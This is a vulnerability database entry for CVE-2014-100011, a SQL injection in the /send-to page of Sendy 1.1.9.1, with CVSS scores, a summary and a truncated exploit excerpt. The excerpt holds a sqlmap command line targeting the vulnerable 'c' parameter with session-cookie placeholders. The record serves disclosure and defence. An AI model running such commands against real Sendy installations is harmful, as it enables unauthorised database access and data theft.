7.5
CVSSv2

CVE-2014-100011

Published: 13/01/2015 Updated: 09/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in /send-to in Sendy 1.1.9.1 allows remote malicious users to execute arbitrary SQL commands via the c parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

sendy sendy 1.1.9.1

Exploits

# Exploit Title: Sendy 1191 - SQL Injection Vulnerability # Date: 2014-04-10 # Exploit Author: marduk369 # Vendor Homepage: sendyco/ # Software Link: sendyco/ # Version: 1191 root@kali:~# sqlmap -u 'server1/send-to?i=1&c=10' --cookie="version=1191; PHPSESSID=[phpsessid value]; logged_in=[logged_in value]" -p c - ...